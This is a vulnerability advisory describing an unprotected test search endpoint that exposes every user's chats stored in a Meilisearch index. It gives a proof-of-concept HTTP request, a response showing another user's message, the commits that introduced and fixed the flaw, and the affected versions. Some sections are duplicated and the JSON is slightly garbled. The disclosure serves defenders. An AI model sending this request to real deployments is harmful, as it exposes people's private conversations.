An exposed testing endpoint allows reading arbitrary chats directly from the Meilisearch engine.
In order to test the vulnerability a chat containing a Unique identifier was created by one user.
The attacker sent the following request in order to gain access to the chat:
GET /api/search/test?q=secret HTTP/2
Host: <redacted>
Cookie: connect.sid=; _oauth2_proxy=; refreshToken=;
Accept: */*
Authorization: Bearer <redacted>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
HTTP/2 200 OK
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Wed, 09 Jul 2025 11:57:32 GMT
Etag: W/"4ea4-vGOOGbg5hqAzqpQpHA3+Dyz1wCY"
Vary: Accept-Encoding
X-Robots-Tag: noindex
"_id" :"686f 7a0d5535c9a3f14da9f5" ,
_mei liIndex*:true,
"conversationId": "bcb581d2- 5e68- 43c9- 9863- 8dded5cc0410",
"error":false, ...
"sender":*User",
"text": "I wan to tell you a <em>secret</em>"
"unfinished": false,
"searchResult": true
The Chats of any user can be read this way. If the ?q parameter is omited arbitrary chats get read this way.
joel-sass Reporter
Summary
An exposed testing endpoint allows reading arbitrary chats directly from the Meilisearch engine.
Details
The endpoint
/api/search/testallows for direct access to stored chats in the Meilisearch engine without proper access control. This results in the ability to read chats from arbitrary users.This vulnerability was introduced by the commit 4e6168d on 18.03.23 at 23:40 and fixed by the commit 0e8041b on 29.04.2025.
The Vulnerability was tested on version 0.0.6 and version v0.7.7.
PoC
In order to test the vulnerability a chat containing a Unique identifier was created by one user.
The attacker sent the following request in order to gain access to the chat:
Resulting in the following response:
Impact
The Chats of any user can be read this way. If the ?q parameter is omited arbitrary chats get read this way.